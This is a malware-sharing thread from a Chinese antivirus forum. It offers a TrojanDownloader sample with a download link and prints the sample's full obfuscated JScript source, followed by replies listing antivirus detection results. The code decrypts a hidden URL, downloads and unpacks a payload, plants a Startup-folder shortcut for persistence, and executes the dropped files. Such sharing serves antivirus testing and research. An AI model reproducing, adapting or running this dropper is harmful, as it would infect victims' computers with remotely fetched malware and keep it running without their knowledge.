查看: 919|回复: 6
收起左侧

[病毒样本] #TrojanDownloader (2020-04-29)

[复制链接]
QVM360
发表于 2020-4-29 12:16:29 | 显示全部楼层 |阅读模式
https://kafanealg.lanzous.com/ic2a8gd

https://www.virustotal.com/gui/file/a16a976d97f70dc3f5ca56947d9b5ba04df0f334c2a4cea6be69382f7222c7c1/detection

Code:
  1. var mCDLTm326EEFfcM, NeLAfN261awHjUF, ELdfBi332DUEUjf, dyAcyg844TLcfwH, lWCBYo931lwPXPB, fydCTp921DIEjQc, ilCiAP415wwcDMM, MTpBip432FDIydl, gkzcLY449WcTVDg, ElITzo596QMLpTk, MkAeDg071LwcAcy, pooNCi658DCWnHC, FFBCBU395pglDPP, DFYKUB619ydgXLc, nTBQIP685DAAyFo, TiNgQw227dpcyHe, YmHDcf996EmNQAw, jNjEHT860IAwYdP, XXFiLE178CNknmD, PgPyLE536NNlEDX, neFNgN802VepDCo, XXFiLE178CNknmD, YyfKkd827NeAFMF, iPyWUy974KLgFUV, wLXNDE459dTjzlo, kDDIXM769dFmDAL, gEIpQV540DinNne;
  2. (function() {
  3.     var _0x11E03 = ["\x67\x65\x74\x54\x69\x6D\x65", "", "\x6C\x65\x6E\x67\x74\x68", "\x73\x75\x62\x73\x74\x72", "\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74", "\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65", "\x6A\x56\x51\x4D\x50\x59\x38\x39\x32\x4D\x4B\x43\x48\x6C\x56", "\x33\x43\x43\x45\x31\x35\x44\x38\x30\x34\x36\x45\x43\x34\x43\x42\x43\x35\x43\x43\x42\x30\x39\x35\x38\x34\x46\x46\x35\x34\x44\x34\x36\x44\x43\x38\x41\x38\x39\x42\x39\x44\x38\x38\x38\x37\x38\x46\x46\x41\x36\x36\x44\x34\x34\x36\x33\x46\x31\x44\x30\x32\x35\x33\x44\x31\x35\x32\x43\x36\x41\x45\x42\x39\x44\x30\x33\x38\x35\x41\x44\x45\x34\x34\x33\x36\x32\x37\x33\x35\x33\x33\x30\x39\x36\x43\x46\x34\x36\x33\x43\x33\x41\x41\x45\x35\x32\x36\x36\x36\x38\x30\x41\x37\x35\x38", "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39", "\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72", "\x63\x68\x61\x72\x41\x74", "\x57\x69\x6E\x48\x74\x74\x70\x2E\x57\x69\x6E\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x2E\x35\x2E\x31", "\x53\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x73", "\x47\x45\x54", "\x4F\x70\x65\x6E", "\x53\x65\x6E\x64", "\x53\x74\x61\x74\x75\x73", "\x52\x65\x73\x70\x6F\x6E\x73\x65\x42\x6F\x64\x79", "\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D", "\x54\x79\x70\x65", "\x57\x72\x69\x74\x65", "\x53\x61\x76\x65\x54\x6F\x46\x69\x6C\x65", "\x43\x6C\x6F\x73\x65", "\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74", "\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E", "\x2E", "\x46\x6F\x6C\x64\x65\x72\x45\x78\x69\x73\x74\x73", "\x43\x72\x65\x61\x74\x65\x46\x6F\x6C\x64\x65\x72", "\x50\x61\x74\x68", "\x67\x65\x74\x46\x6F\x6C\x64\x65\x72", "\x4E\x61\x6D\x65\x53\x70\x61\x63\x65", "\x67\x65\x74\x46\x69\x6C\x65", "\x46\x69\x6C\x65\x45\x78\x69\x73\x74\x73", "\x49\x74\x65\x6D\x73", "\x43\x6F\x70\x79\x48\x65\x72\x65", "\x64\x65\x6C\x65\x74\x65\x66\x69\x6C\x65", "\x38\x45\x44\x36\x36\x41\x42\x33\x35\x34", "\x32\x39\x33\x44\x46\x37\x33\x35\x45\x43", "\x6A\x43\x65\x49\x70\x41\x34\x38\x36\x6A\x79\x54\x67\x55\x51", "\x32\x42\x33\x33\x46\x42\x33\x34\x45\x39", "\x44\x30\x37\x45\x45\x45\x31\x41\x33\x42\x44\x42\x31\x37\x42\x45\x31\x46\x41\x33\x34\x38\x46\x45\x32\x30\x43\x39\x35\x32\x45\x35\x32\x38\x44\x32", "\x47\x65\x74\x46\x6F\x6C\x64\x65\x72", "\x66\x69\x6C\x65\x73", "\x61\x74\x45\x6E\x64", "\x6D\x6F\x76\x65\x4E\x65\x78\x74", "\x73\x69\x7A\x65", "\x69\x74\x65\x6D", "\x4D\x6F\x76\x65\x46\x69\x6C\x65", "\x5C\x54\x69\x56\x45\x7A\x44\x37\x30\x36\x64\x63\x50\x4E\x61\x70", "\x51\x75\x69\x74", "\x43\x72\x65\x61\x74\x65\x54\x65\x78\x74\x46\x69\x6C\x65", "\x44\x45\x6D\x6F\x4E\x6E\x35\x31\x39\x44\x44\x6F\x49\x44\x43", "\x57\x72\x69\x74\x65\x4C\x69\x6E\x65", "\x5C\x4D\x54\x70\x42\x69\x70\x34\x33\x32\x46\x44\x49\x79\x64\x6C", "\x5C", "\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C", "\x34\x46\x43\x38\x36\x42\x39\x44\x35\x44\x38\x31\x41\x46\x31\x38", "\x53\x70\x65\x63\x69\x61\x6C\x46\x6F\x6C\x64\x65\x72\x73", "\x2E\x6C\x6E\x6B", "\x43\x72\x65\x61\x74\x65\x53\x68\x6F\x72\x74\x63\x75\x74", "\x54\x61\x72\x67\x65\x74\x50\x61\x74\x68", "\x41\x72\x67\x75\x6D\x65\x6E\x74\x73", "\x20", "\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E", "\x79\x70\x64\x49\x44\x6E\x33\x37\x33\x4E\x50\x4E\x56\x69\x69", "\x48\x6F\x74\x6B\x65\x79", "\x49\x63\x6F\x6E\x4C\x6F\x63\x61\x74\x69\x6F\x6E", "\x36\x43\x42\x46\x37\x33\x42\x41\x36\x36\x38\x32\x41\x38\x32\x33\x42\x31\x45\x44\x31\x45\x44\x44\x30\x30", "\x57\x69\x6E\x64\x6F\x77\x53\x74\x79\x6C\x65", "\x57\x6F\x72\x6B\x69\x6E\x67\x44\x69\x72\x65\x63\x74\x6F\x72\x79", "\x53\x61\x76\x65", "\x52\x75\x6E"];

  4.     function _0x11E20(_0x11E20) {
  5.         var _0x11E5A = new Date();
  6.         var _0x11E77 = 0;
  7.         while (_0x11E77 < (_0x11E20 * 1000)) {
  8.             var _0x11E3D = new Date();
  9.             var _0x11E77 = _0x11E3D[_0x11E03[0]]() - _0x11E5A[_0x11E03[0]]()
  10.         }
  11.     }

  12.     function _0x11E3D(_0x11EEB) {
  13.         if (_0x11EEB == _0x11E03[1]) {
  14.             return
  15.         };
  16.         var _0x11ECE = ELdfBi332DUEUjf[_0x11E03[2]];
  17.         var _0x11E77 = -1;
  18.         var _0x11EB1 = 0;
  19.         var _0x11E20 = _0x11E03[1];
  20.         var _0x11E5A = 0;
  21.         var _0x11E94 = 0;
  22.         var _0x11E3D = 0;
  23.         _0x11EB1 = parseInt(_0x11EEB[_0x11E03[3]](0, 2), 16);
  24.         for (_0x11E5A = 2; _0x11E5A < _0x11EEB[_0x11E03[2]]; _0x11E5A += 2) {
  25.             _0x11E94 = parseInt(_0x11EEB[_0x11E03[3]](_0x11E5A, 2), 16);
  26.             if (_0x11E77 < _0x11ECE - 1) {
  27.                 _0x11E77++
  28.             } else {
  29.                 _0x11E77 = 0
  30.             };
  31.             _0x11E3D = _0x11E94 ^ ELdfBi332DUEUjf[_0x11E03[4]](_0x11E77);
  32.             if (_0x11E3D <= _0x11EB1) {
  33.                 _0x11E3D = 255 + _0x11E3D - _0x11EB1
  34.             } else {
  35.                 _0x11E3D = _0x11E3D - _0x11EB1
  36.             };
  37.             _0x11E20 += String[_0x11E03[5]](_0x11E3D);
  38.             _0x11EB1 = _0x11E94
  39.         };
  40.         return _0x11E20
  41.     }

  42.     function _0x11E5A(_0x11E5A) {
  43.         var _0x11E77 = _0x11E03[1];
  44.         var _0x11E3D = _0x11E03[8];
  45.         for (var _0x11E20 = 0; _0x11E20 < _0x11E5A; _0x11E20++) {
  46.             _0x11E77 += _0x11E3D[_0x11E03[11]](Math[_0x11E03[10]](Math[_0x11E03[9]]() * _0x11E3D[_0x11E03[2]]))
  47.         };
  48.         return _0x11E77
  49.     }

  50.     function _0x11E77(_0x11E94, _0x11E77) {
  51.         var _0x11E3D;
  52.         var _0x11E5A;
  53.         try {
  54.             var _0x11E20 = new ActiveXObject(_0x11E03[12]);
  55.             _0x11E20[_0x11E03[13]](30000, 30000, 30000, 5000);
  56.             void(((_0x11E20[_0x11E03[15]](_0x11E03[14], _0x11E94, false))));
  57.             _0x11E20[_0x11E03[16]]();
  58.             if (_0x11E20[_0x11E03[17]] == 404) {
  59.                 return false
  60.             };
  61.             _0x11E3D = _0x11E20[_0x11E03[18]]
  62.         } catch (ex) {
  63.             return false
  64.         };
  65.         _0x11E5A = new ActiveXObject(_0x11E03[19]);
  66.         _0x11E5A[_0x11E03[20]] = 1;
  67.         _0x11E5A[_0x11E03[15]]();
  68.         _0x11E5A[_0x11E03[21]](_0x11E3D);
  69.         _0x11E5A[_0x11E03[22]](_0x11E77, 2);
  70.         _0x11E5A[_0x11E03[23]]();
  71.         return true
  72.     }

  73.     function _0x11E94(_0x11E5A, _0x11E94) {
  74.         var _0x11EB1 = new ActiveXObject(((_0x11E03[24]))),
  75.             _0x11E77 = new ActiveXObject((_0x11E03[25])),
  76.             _0x11E20, _0x11E3D;
  77.         if (!_0x11E94) {
  78.             _0x11E94 = _0x11E03[26]
  79.         };
  80.         if (!_0x11EB1[_0x11E03[27]](_0x11E94)) {
  81.             _0x11EB1[_0x11E03[28]](_0x11E94)
  82.         };
  83.         _0x11E20 = _0x11E77[_0x11E03[31]](_0x11EB1[_0x11E03[30]](_0x11E94)[_0x11E03[29]]);
  84.         _0x11E3D = _0x11E77[_0x11E03[31]](_0x11EB1[_0x11E03[32]](_0x11E5A)[_0x11E03[29]]);
  85.         if (_0x11EB1[_0x11E03[33]](_0x11E5A)) {
  86.             _0x11E20[_0x11E03[35]](_0x11E3D[_0x11E03[34]](), 4 + 16);
  87.             _0x11EB1[_0x11E03[36]](_0x11E5A)
  88.         }
  89.     }

  90.     function _0x11EB1(_0x11E3D) {
  91.         var _0x11EB1, _0x11ECE, _0x11E77, _0x11E5A, _0x11E20;
  92.         _0x11ECE = new ActiveXObject(((_0x11E03[24])));
  93.         var _0x11E94;
  94.         _0x11E94 = new ActiveXObject(((_0x11E03[24])));
  95.         _0x11EB1 = new ActiveXObject(((_0x11E03[24])));
  96.         _0x11E77 = _0x11EB1[_0x11E03[42]](_0x11E3D);
  97.         _0x11E5A = new Enumerator(_0x11E77[_0x11E03[43]]);
  98.         _0x11E20 = _0x11E03[1];
  99.         for (; !_0x11E5A[_0x11E03[44]](); _0x11E5A[_0x11E03[45]]()) {
  100.             if (_0x11E5A[_0x11E03[47]]()[_0x11E03[46]] >= 1000007) {
  101.                 _0x11E94[_0x11E03[48]](_0x11E5A[_0x11E03[47]](), _0x11E3D + pooNCi658DCWnHC);
  102.                 FFBCBU395pglDPP = _0x11E3D + pooNCi658DCWnHC
  103.             } else {
  104.                 if (_0x11E5A[_0x11E03[47]]()[_0x11E03[46]] < 10007) {
  105.                     _0x11E94[_0x11E03[48]](_0x11E5A[_0x11E03[47]](), _0x11E3D + ElITzo596QMLpTk);
  106.                     nTBQIP685DAAyFo = _0x11E3D + ElITzo596QMLpTk
  107.                 } else {
  108.                     if (_0x11E5A[_0x11E03[47]]()[_0x11E03[46]] < 1000007 & _0x11E5A[_0x11E03[47]]()[_0x11E03[46]] > 300007) {
  109.                         _0x11E94[_0x11E03[48]](_0x11E5A[_0x11E03[47]](), _0x11E3D + gkzcLY449WcTVDg);
  110.                         DFYKUB619ydgXLc = _0x11E3D + gkzcLY449WcTVDg
  111.                     }
  112.                 }
  113.             }
  114.         };
  115.         return _0x11E20
  116.     }
  117.     mCDLTm326EEFfcM = _0x11E20;
  118.     NeLAfN261awHjUF = _0x11E3D;
  119.     lWCBYo931lwPXPB = _0x11E5A;
  120.     fydCTp921DIEjQc = _0x11E77;
  121.     ilCiAP415wwcDMM = _0x11E94;
  122.     jNjEHT860IAwYdP = _0x11EB1;
  123.     ELdfBi332DUEUjf = _0x11E03[6];
  124.     dyAcyg844TLcfwH = _0x11E3D(_0x11E03[7]);
  125.     MTpBip432FDIydl = _0x11E5A(8);
  126.     gkzcLY449WcTVDg = _0x11E5A(8) + (_0x11E3D(_0x11E03[37]));
  127.     ElITzo596QMLpTk = _0x11E5A(8);
  128.     MkAeDg071LwcAcy = _0x11E5A(8);
  129.     pooNCi658DCWnHC = MkAeDg071LwcAcy + (_0x11E3D(_0x11E03[38]));
  130.     TiNgQw227dpcyHe = _0x11E03[39] + (_0x11E3D(_0x11E03[40]));
  131.     YmHDcf996EmNQAw = _0x11E3D(_0x11E03[41]);
  132.     _0x11E20(2);
  133.     _0x11E20(2);
  134.     XXFiLE178CNknmD = new ActiveXObject(_0x11E03[24]);
  135.     if (XXFiLE178CNknmD[_0x11E03[33]](YmHDcf996EmNQAw + _0x11E03[49])) {
  136.         WScript[_0x11E03[50]]()
  137.     } else {
  138.         try {
  139.             PgPyLE536NNlEDX = new ActiveXObject(_0x11E03[24]);
  140.             neFNgN802VepDCo = PgPyLE536NNlEDX[_0x11E03[51]](YmHDcf996EmNQAw + _0x11E03[49], true);
  141.             neFNgN802VepDCo[_0x11E03[53]](_0x11E03[52]);
  142.             neFNgN802VepDCo[_0x11E03[23]]()
  143.         } catch (ex) {}
  144.     };
  145.     _0x11E20(2);
  146.     XXFiLE178CNknmD = new ActiveXObject(((_0x11E03[24])));
  147.     if (XXFiLE178CNknmD[_0x11E03[27]](YmHDcf996EmNQAw + _0x11E03[54])) {} else {
  148.         try {
  149.             YyfKkd827NeAFMF = new ActiveXObject(((_0x11E03[24])));
  150.             YyfKkd827NeAFMF[_0x11E03[28]](YmHDcf996EmNQAw + _0x11E03[55] + MTpBip432FDIydl);
  151.             _0x11E20(2);
  152.             iPyWUy974KLgFUV = new ActiveXObject((_0x11E03[56]));
  153.             ladopW576EAVDIY = iPyWUy974KLgFUV[_0x11E03[58]](_0x11E3D(_0x11E03[57]));
  154.             wLXNDE459dTjzlo = iPyWUy974KLgFUV[_0x11E03[60]](ladopW576EAVDIY + _0x11E03[55] + _0x11E5A(8) + (_0x11E03[59]));
  155.             wLXNDE459dTjzlo[_0x11E03[61]] = YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55] + gkzcLY449WcTVDg;
  156.             wLXNDE459dTjzlo[_0x11E03[62]] = _0x11E03[63] + YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55] + ElITzo596QMLpTk + _0x11E03[63] + YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55] + pooNCi658DCWnHC;
  157.             wLXNDE459dTjzlo[_0x11E03[64]] = _0x11E03[65];
  158.             wLXNDE459dTjzlo[_0x11E03[66]] = _0x11E03[1];
  159.             wLXNDE459dTjzlo[_0x11E03[67]] = (_0x11E3D(_0x11E03[68]));
  160.             wLXNDE459dTjzlo[_0x11E03[69]] = 7;
  161.             wLXNDE459dTjzlo[_0x11E03[70]] = YmHDcf996EmNQAw + MTpBip432FDIydl;
  162.             wLXNDE459dTjzlo[_0x11E03[71]]()
  163.         } catch (ex) {};
  164.         _0x11E20(2);
  165.         _0x11E20(2);
  166.         _0x11E77(dyAcyg844TLcfwH, YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55] + TiNgQw227dpcyHe);
  167.         _0x11E20(2);
  168.         _0x11E20(2);
  169.         _0x11E94(YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55] + TiNgQw227dpcyHe, YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55]);
  170.         _0x11E20(2);
  171.         _0x11E20(2);
  172.         _0x11E20(2);
  173.         _0x11EB1(YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55]);
  174.         _0x11E20(2);
  175.         _0x11E20(2);
  176.         kDDIXM769dFmDAL = new ActiveXObject((_0x11E03[56]));
  177.         gEIpQV540DinNne = new ActiveXObject(((_0x11E03[24])));
  178.         if (gEIpQV540DinNne[_0x11E03[33]](DFYKUB619ydgXLc)) {
  179.             kDDIXM769dFmDAL[_0x11E03[72]](String[_0x11E03[5]](34) + YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55] + gkzcLY449WcTVDg + String[_0x11E03[5]](34) + String[_0x11E03[5]](32) + String[_0x11E03[5]](34) + YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55] + ElITzo596QMLpTk + String[_0x11E03[5]](34) + String[_0x11E03[5]](32) + String[_0x11E03[5]](34) + YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55] + pooNCi658DCWnHC + String[_0x11E03[5]](34))
  180.         };
  181.         _0x11E20(11)
  182.     }
  183. })()
复制代码


a233
发表于 2020-4-29 12:17:49 | 显示全部楼层
Avast
SNH:Script [Dropper]
猥琐大叔
发表于 2020-4-29 12:44:24 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
岚Azure
发表于 2020-4-29 14:49:34 | 显示全部楼层
BD企业版——文件防护
清空
wangyuhe
发表于 2020-4-29 16:07:25 | 显示全部楼层
蜘蛛 扫描 miss
莒县小哥
发表于 2020-4-29 16:34:47 | 显示全部楼层
  1. Microsoft

  2. Trojan:JS/Denali.A!ml
复制代码
epattack
发表于 2020-4-29 16:43:55 | 显示全部楼层
微点Miss

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-28 18:46 , Processed in 0.146052 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表